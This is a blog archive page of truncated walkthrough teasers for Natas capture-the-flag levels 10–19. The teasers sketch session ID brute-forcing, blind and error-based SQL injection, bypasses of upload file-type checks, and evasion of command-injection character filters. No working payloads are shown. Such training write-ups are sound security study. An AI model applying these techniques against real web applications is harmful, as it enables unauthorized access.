Month: January 2015

Natas Level 19

This is a really fabulous hint.  We know we’ll have to brute force the session ID again, and we also know the pattern is not sequential like the previous level, so lets start checking out some sample session IDs: Hmmm, all the session IDs consist of letters a-f and digits

Read More »

Natas Level 18

No matter what you log in as it says “You are logged in as a regular user. Login as an admin to retrieve credentials for natas19”. We need to get the session where $_SESSION[‘admin’] == 1, but how do we know which PHPSESSID is associated with this? Well earlier in

Read More »

Natas Level 17

Our username check is back, and this time it’s not telling us anything: It looks like they forgot to uncomment all the messages before they published this file.  That’s ok, we can take the same strategy as the other blind sql level, and use an if statement combined with the

Read More »

Natas Level 16

Looks like our old friend is back, and this time they are filtering MORE STUFF OMG!!!  TOO BAD IT’S STILL NOT ENOUGH FTW!!! You can see they are filtering the following characters: ; | & ` \ ‘ ” On top of that they put our input inside of double

Read More »

Natas Level 15

We have a box here we can use to check whether a username exists or not.  I started out trying some regular inputs like this: Then I tried something more devious, a single quotation mark: We get an error message, but it’s not as specific as the last level.  This

Read More »

Natas Level 14

Just a plain looking login page, lets jump to the source code: So $query is being initialized with unsanitized user input via $_REQUEST[“username”] and $_REQUEST[“password”].  I wonder what would happen if we put a quotation mark(“) in either field?  Let’s try it, we’ll also include “?debug=1” in the URL because

Read More »

Natas Level 13

This is just like level 12 except this time they claim they are checking that the uploaded files are actually images.  If we peek at the source we can see they are using the function exif_imagetype() to do the check.  Here’s the code snippet: According to php.net “exif_imagetype() reads the

Read More »

Natas Level 12

We actually don’t even need to look at the source code to beat this level.  They are allowing us to upload a JPEG up to 1KB in size.  I’m willing to bet that they don’t even check to see if we really are uploading a JPEG.  If I’m right we

Read More »

Natas Level 11

This level has some meat to it so let’s jump right to the source code: We’ll follow the flow of execution and take it (almost) line by line. This creates an array called $defaultdata with two keys “showpassword” and “bgcolor” with values set to “no” and “#ffffff” respectively. This sets

Read More »

Natas Level 10

This level is almost identical to the previous, except for some minor input sanitation.  The script is now checking for the existence of three characters, “;”, “|”, and “&” in the user input.  If they are found we receive an error message.  See for yourself: The great thing about this

Read More »